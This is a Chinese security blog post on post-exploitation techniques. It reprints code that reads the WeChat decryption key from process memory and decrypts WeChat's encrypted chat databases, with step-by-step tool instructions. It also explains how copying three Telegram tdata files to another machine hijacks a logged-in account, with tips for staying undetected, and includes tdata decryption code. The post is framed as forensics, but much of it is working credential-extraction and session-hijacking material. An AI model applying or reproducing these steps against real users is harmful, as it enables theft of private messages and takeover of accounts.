浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理
2023-12-1 10:9:23 Author: 藏剑安全(查看原文) 阅读量:7 收藏

免责声明

由于传播、利用本公众号藏剑安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号藏剑安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把藏剑安全设为星标”,否则可能就看不到了啦!

最近工作中遇到许多取证工作,有相关部门人员咨询相关技术问题,那么,借此机会,今天麋鹿带大家了解一下解密wx聊天记录,以及劫持tg账号,顺便浅析一下原理

先聊微x

如何获取微x的key

贴一个代码,源自此项目

https://github.com/xaoyaoo/PyWxDump

麋鹿摘选了部分关键代码来探讨如何获取wxid key这些

# 读取内存中的字符串(非key部分)
def get_info_without_key(h_process, address, n_size=64):
    array = ctypes.create_string_buffer(n_size)
    if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"
    array = bytes(array).split(b"\x00")[0] if b"\x00" in array else bytes(array)
    text = array.decode('utf-8', errors='ignore')
    return text.strip() if text.strip() != "" else "None"

def get_info_wxid(h_process, address, n_size=32, address_len=8):
    array = ctypes.create_string_buffer(address_len)
    if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
    address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
    wxid = get_info_without_key(h_process, address, n_size)
    if not wxid.startswith("wxid_"): wxid = "None"
    return wxid

# 读取内存中的key
def get_key(h_process, address, address_len=8):
    array = ctypes.create_string_buffer(address_len)
    if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
    address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
    key = ctypes.create_string_buffer(32)
    if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"
    key_string = bytes(key).hex()
    return key_string

# 读取信息(account,mobile,name,mail,wxid,key)
def read_info(version_list):
    wechat_process = []
    result = []

    for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):
        if process.name() == 'WeChat.exe':
            wechat_process.append(process)

    if len(wechat_process) == 0:
        return "[-] WeChat No Run"

    for process in wechat_process:
        tmp_rd = {}

        tmp_rd['pid'] = process.pid
        tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())

        bias_list = version_list.get(tmp_rd['version'], None)
        if not isinstance(bias_list, list):
            return f"[-] WeChat Current Version {tmp_rd['version']} Is Not Supported"

        wechat_base_address = 0
        for module in process.memory_maps(grouped=False):
            if module.path and 'WeChatWin.dll' in module.path:
                wechat_base_address = int(module.addr, 16)
                break
        if wechat_base_address == 0:
            return f"[-] WeChat WeChatWin.dll Not Found"

        Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
        account__baseaddr = wechat_base_address + bias_list[1]
        tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"
         result.append(tmp_rd)

    return result

运行就可以得到key

AUTUMN LEAVES

获取key的原理

现在开始分析一下上面代码的原理

首先读取微x版本然后获得该版本的偏移地址(各版本偏移地址网上一大堆,上面那款工具里也自带  如下../version_list.json)


这些数字是什么意思呢,麋鹿随便找了个版本地址,前五个地址分别对应昵称、账号、手机号、邮箱(过时)、key
"3.9.2.23": [
        50320784,
        50321712,
        50320640,
        38986104,
        50321676,
        50592864
    ],

举个例子,要获取account字符(也就是修改后自定义的id,比如我的是i_still_be_milu)是如下过程

read_info(version_list)函数

1.用 psutil.process_iter 遍历所有正在运行的进程,并将所有进程的名称、可执行文件路径、进程ID以及命令行信息传入process 对象

2.检查当前进程的名称是否为 'WeChat.exe',也就是找wx进程,所以获取key是需要该机器登录着微x

if process.name() == 'WeChat.exe':

3.把WeChat微x进程的 PID存储到 tmp_rd 字典

tmp_rd['pid'] = process.pid

4.获取与当前 WeChat 进程版本对应的偏移量列表,还记得上面说到的那个记录微x各版本偏移地址的json文件吗,就是在这里读取到对应的偏移地址

bias_list = version_list.get(tmp_rd['version'], None)

5.查看是否包含WeChatWin.dll模块

if module.path and 'WeChatWin.dll' in module.path:

6.如果找到WeChatWin.dll,使用 ctypes 库调用 Windows 的 kernel32.dll 中的 OpenProcess 函数,打开该进程相关联的句柄,接着读微x进程的内存

Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
参数 0x1F0FFF 是 PROCESS_ALL_ACCESS,表示请求所有可能的访问权限;False 表示句柄不会被继承;process.pid 是当前 WeChat 进程的 PID

7.通过将wechat_base_addressbias_list[1]相加来获取微x进程的account信息的内存地址

account__baseaddr = wechat_base_address + bias_list[1]

8.用前面获取的句柄 Handle 和基址传入get_info_without_key函数读取微x内存中的数据

tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"  
如果对应的偏移量为0,则表示该信息不存在,返回 "None"

进入get_info_without_key函数

9.创建一个字符串缓冲区,用于存储从进程中读取的数据。

调用 Windows API 函数 ReadProcessMemory,从进程地址 address 中读取相应数据赋值到 array 。如果读取失败,则返回 "None"。

if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"

10.然后解码成utf-8并去掉字符串两端的空白字符,最后得到array,也就是account的值

get_info_wxid函数和without函数功能大同小异,不重新解读

只说一点,windows下是地址是小端序,所以用int.from_bytes将字节数组逆序排列并转换为整数类型

至此,流程一目了然,下一步:

AUTUMN LEAVES

如何解密数据库

1.首先把刚才在获取到的key保存成如下格式

每两个字符前加一个0x,并用","分割开,该文件重命名为DBPass.Bin

2.打开聊天记录目录下的MSG文件夹中找到MicroMsg.db文件

3.在上一步的文件夹中找到Multi目录,在Multi目录找到MSG0.db文件

4.把上面三个文件传到我们的机器,放到一个目录,记为A目录

5.在解密的机器下载javafx-sdk-18.0.2和java环境(本机jdk11)

这里记javafx-sdk-18.0.2\lib的目录为B

记jdk-11.0.2\bin目录为C

6.在C目录,也就是jdk-11.0.2\bin目录运行下面命令

javaw.exe  --module-path "B路径" --add-modules=javafx.base --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.graphics --add-modules=javafx.media --add-modules=javafx.swing --add-modules=javafx.web -jar chatViewTool.jar

解密工具就运行起来了

然后再1和2处都选择A目录,先1后2

至此,如下图,解密完成

翻一翻有可能找到有用信息

解密数据库原理

还记得聊天记录目录下的那些.db文件吗,毫无疑问这些都是加密过的SQLite数据库文件(sqlite3),那么该如何解密这个文件呢,还是像以往一样,麋鹿节选一段代码,依然选自本文开头的那个github项目


# 通过密钥解密数据库
def decrypt(key: str, db_path, out_path):
    if not os.path.exists(db_path):
        return f"[-] db_path:'{db_path}' File not found!"
    if not os.path.exists(os.path.dirname(out_path)):
        return f"[-] out_path:'{out_path}' File not found!"
    if len(key) != 64:
        return f"[-] key:'{key}' Error!"
    password = bytes.fromhex(key.strip())
    with open(db_path, "rb") as file:
        blist = file.read()

    salt = blist[:16]
    byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)
    first = blist[16:DEFAULT_PAGESIZE]

    mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])
    mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)
    hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)
    hash_mac.update(b'\x01\x00\x00\x00')

    if hash_mac.digest() != first[-32:-12]:
        return f"[-] Password Error! (key:'{key}'; db_path:'{db_path}'; out_path:'{out_path}' )"

    newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

    with open(out_path, "wb") as deFile:
        deFile.write(SQLITE_FILE_HEADER.encode())
        t = AES.new(byteKey, AES.MODE_CBC, first[-48:-32])
        decrypted = t.decrypt(first[:-48])
        deFile.write(decrypted)
        deFile.write(first[-48:])

        for i in newblist:
            t = AES.new(byteKey, AES.MODE_CBC, i[-48:-32])
            decrypted = t.decrypt(i[:-48])
            deFile.write(decrypted)
            deFile.write(i[-48:])
    return [True, db_path, out_path, key]

def batch_decrypt(key: str, db_path: Union[str, List[str]], out_path: str):
    if not isinstance(key, str) or not isinstance(out_path, str) or not os.path.exists(out_path) or len(key) != 64:
        return f"[-] (key:'{key}' or out_path:'{out_path}') Error!"

    process_list = []

    if isinstance(db_path, str):
        if not os.path.exists(db_path):
            return f"[-] db_path:'{db_path}' not found!"

        if os.path.isfile(db_path):
            inpath = db_path
            outpath = os.path.join(out_path, 'de_' + os.path.basename(db_path))
            process_list.append([key, inpath, outpath])

        elif os.path.isdir(db_path):
            for root, dirs, files in os.walk(db_path):
                for file in files:
                    inpath = os.path.join(root, file)
                    rel = os.path.relpath(root, db_path)
                    outpath = os.path.join(out_path, rel, 'de_' + file)

                    if not os.path.exists(os.path.dirname(outpath)):
                        os.makedirs(os.path.dirname(outpath))
                    process_list.append([key, inpath, outpath])
        else:
            return f"[-] db_path:'{db_path}' Error "
    elif isinstance(db_path, list):
        rt_path = os.path.commonprefix(db_path)
        if not os.path.exists(rt_path):
            rt_path = os.path.dirname(rt_path)

        for inpath in db_path:
            if not os.path.exists(inpath):
                return f"[-] db_path:'{db_path}' not found!"

            inpath = os.path.normpath(inpath)
            rel = os.path.relpath(os.path.dirname(inpath), rt_path)
            outpath = os.path.join(out_path, rel, 'de_' + os.path.basename(inpath))
            if not os.path.exists(os.path.dirname(outpath)):
                os.makedirs(os.path.dirname(outpath))
            process_list.append([key, inpath, outpath])
    else:
        return f"[-] db_path:'{db_path}' Error "

    result = []
    for i in process_list:
        result.append(decrypt(*i)) # 解密

    # 删除空文件夹
    for root, dirs, files in os.walk(out_path, topdown=False):
        for dir in dirs:
            if not os.listdir(os.path.join(root, dir)):
                os.rmdir(os.path.join(root, dir))

    return result

该代码核心在于decrypt()函数,故只解读此函数

提前说几个知识点,希望有助于读者理解下文

1.微信用的加密算法是256位的AES-CBC

2.数据库的默认的页大小是4096字节即4KB

3. 每一个数据库文件的开头16字节都保存了一段唯一且随机的盐值,作为HMAC的验证和数据的解密

4.加密文件的每一页都存有着消息认证码,算法使用的是HMAC-SHA1

5.用来计算HMAC的key与解密的key是不同的,解密用的密钥是主密钥和之前提到的16字节的盐值变化得到的

decrypt()解密函数

1.接受三个参数:密钥(字符串类型)、数据库路径(字符串类型)和输出路径(字符串类型)。

def decrypt(key: str, db_path, out_path):

2.前几行都是检测传入的那两个路径和key长度(64位)是否正确,跳过

将key转换为字节串。key.strip()是移除密钥字符串两端的空白字符。

password = bytes.fromhex(key.strip())

3.以二进制模式打开数据库文件,将整个数据库文件读取到一个字节串blist,并从字节串中提取前16个字节作为盐值(计为A)

with open(db_path, "rb") as file:
        blist = file.read()

    salt = blist[:16]

4.使用密码(key)、盐值(A)和DEFAULT_ITER参数(前面声明过)来生成一个密钥。这里使用了SHA-1哈希函数和默认的迭代次数和密钥大小

byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)

5,下面几行用于计算用于验证数据库完整性的MAC(消息认证码)。这里使用了SHA-1哈希函数和HMAC(带密钥的哈希算法)。如果计算出的HMAC与存储在数据库中的HMAC不匹配,则返回一个错误

过程简单一点来说,就是生成一个新的盐值(记为B),用B key和DEFAULT_ITE生成一个新密钥,然后用计算出的HMAC是否与存储在数据库中的HMAC相匹配

6.分割blist

newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

7.用AES加密算法和CBC模式创建一个新的加密器,使用前面生成的密钥作为初始化向量,然后解密,写入文件

decrypted = t.decrypt(first[:-48])
deFile.write(decrypted)

8.重复上面过程,解密每一个块,结束

限于本文篇幅,以及为了增加文章可读性,麋鹿在解密的过程中省略了一些的细节,毕竟这东西实在是枯燥无味,麋鹿连sqlite3.connect这些函数都未做介绍,感兴趣的读者可以自己去读一下该项目的源码,最后,附上几个吾私以为不错的工具and文章


https://www.52pojie.cn/thread-1084703-1-1.html
https://github.com/x1hy9/WeChatUserDB
https://github.com/HackerDev-Felix/WechatDecrypt/blob/main/wechat.cpp
https://www.zetetic.net/sqlcipher/design/

再聊tg

tg目录结构

tg用户数据存放在安装目录下的tdata文件夹内。

一个有效的Telegram登录用户的目录结构如下:

形象一点讲,就是下面这个样子

其中,重点说一下这几个文件

  • tdata/key_datas保存了解密文件的密钥localKey

  • tdata/D877F783D5D3EF8Cs保存了与云端通信的主密钥和用户的userId

  • tdata/D877F783D5D3EF8C/map保存了用户的基本信息,如用户id,头像,姓名,注册电话,上次在线时间

  • key_datas保存了解密其他文件的主密钥localKey

认证和加密流程

telegram所使用的mproto通信协议是自己开发的,不过多解读

对文件和消息进行加密则用的是AES-IGE模式

Session劫持

因为tg是支持多端登录的,所以能通过迁移tdata的方法来保持session

如果对方聊天记录特别多,那么复制整个tdata文件夹的这个办法实在是过于臃肿局限,所以一般情况只需要复制下面三个文件即可达到劫持目的

  • tdata/key_datas

  • tdata/D877F783D5D3EF8Cs

  • tdata/D877F783D5D3EF8C/map

如上图所示,把这三个文件(登录tg的A机器里)复制到另外一台机器(B)对应目录以后,在B机器运行tg程序即可劫持,可以正常收到消息

还有一种情况,如果对方机器上登录过多个不同账号

对应文件名按如下顺序生成

D877F783D5D3EF8C
A7FDF864FBC10B77
F8806DD0C461824F
C2B05980D9127787
0CA814316818D8F6

一些重点

  1. 如果想两台机器同时登录这个被劫持的tg号,需要在账号本人的机器上挂代理,要不会掉

  2. 如果tg开启了两步验证,需要知道密码

加解密原理分析

不想贴tg的代码分析了,显得文章过于臃肿,贴一个前辈的文章吧
https://www.ifmobi.com/telegram/1150.html
如这篇文章所诉,加密的代码在下面这三个文件
storage_file_utilities.cpp
mtproto_auth_key.h
mtproto_auth_key.cpp

解密过程

先用sha512(salt + passcode + salt)生成hash值

接下来再调用pbkdf2_hmac函数,将hash和salt作为输入参数,进行重复计算后得到最终的导出密钥passcode_key,然后带入decrypt_local解出local_key最后用local_key去解密其他文件

(只截取部分关键代码)

class TdataReader:
    DEFAULT_DATANAME = 'data'

    def __init__(self, base_path: str, dataname: str = None):
        self._base_path = base_path
        self._dataname = dataname or TdataReader.DEFAULT_DATANAME

    def read(self, passcode: str = None) -> ParsedTdata:
        parsed_tdata = ParsedTdata()
        parsed_tdata.settings = self.read_settings()

        local_key, account_indexes = self.read_key_data(passcode)

        accounts = {}

        for account_index in account_indexes:
            account_reader = AccountReader(self._base_path, account_index, self._dataname)
            accounts[account_index] = account_reader.read(local_key)

        parsed_tdata.accounts = accounts
        return parsed_tdata

    def read_key_data(self, passcode: str = None) -> Tuple[bytes, List[int]]:
        if passcode is None:
            passcode = ''

        key_data_tdf = read_tdf_file(self._path(self._key_data_name()))
        local_key, account_indexes_data = decrypt_key_data_tdf(passcode.encode(), key_data_tdf)
        account_indexes, _ = read_key_data_accounts(BytesIO(account_indexes_data))

        return local_key, account_indexes

def create_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = kStrongIterationsCount
    else:
        iterations = 1

    password = hashlib.sha512(salt + passcode + salt).digest()
    return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)

def create_legacy_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = LocalEncryptIterCount
    else:
        iterations = LocalEncryptNoPwdIterCount

    return hashlib.pbkdf2_hmac('sha1', passcode, salt, iterations, 256)

def decrypt_key_data_tdf(passcode: bytes, key_data_tdf: RawTdfFile):
    stream = BytesIO(key_data_tdf.encrypted_data)

    salt = read_qt_byte_array(stream)
    key_encrypted = read_qt_byte_array(stream)
    info_encrypted = read_qt_byte_array(stream)

    passcode_key = create_local_key(passcode, salt)
    local_key = decrypt_local(key_encrypted, passcode_key)

    info_decrypted = decrypt_local(info_encrypted, local_key)
    return local_key, info_decrypted

def create_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = kStrongIterationsCount
    else:
        iterations = 1

    password = hashlib.sha512(salt + passcode + salt).digest()
    return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)

这里麋鹿实在是想展开好好讲讲,可是这样会文章过于臃肿,而又有很少的读者会有耐心和兴趣读下去,其次实在是浪费麋鹿自身时间,最关键的是我今晚写文章忘了吃饭,现在饿的头晕,不夸张,是真的快饿倒了,现在大脑十分疲惫加上着急去吃饭,怕一时笔误误导读者

鉴于以上原因,麋鹿这里依然省略部分细节问题,最后放上一个解密工具,有兴趣的读者可以自行阅读代码

https://github.com/ntqbit/tdesktop-decrypter


内推|长亭科技2024届秋招开启,附内推码~

你能拿她学校的shell,但永远拿不了她的shell

渗透实战|记一次简单的Docker逃逸+反编译jar接管云主机

渗透实战|NPS反制之绕过登陆验证

渗透实战|记一次曲折的EDU通杀漏洞挖掘

免责声明
由于传播、利用本公众号藏剑安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号藏剑安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDA5NzUzNA==&mid=2247485538&idx=1&sn=ff7fb3fbff5f63e74628c76f3a938c45&chksm=cfe09273f8971b65769f085d7a6ce602ecb92a9471de7f017e9f6760b3038a139955abde6c15&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh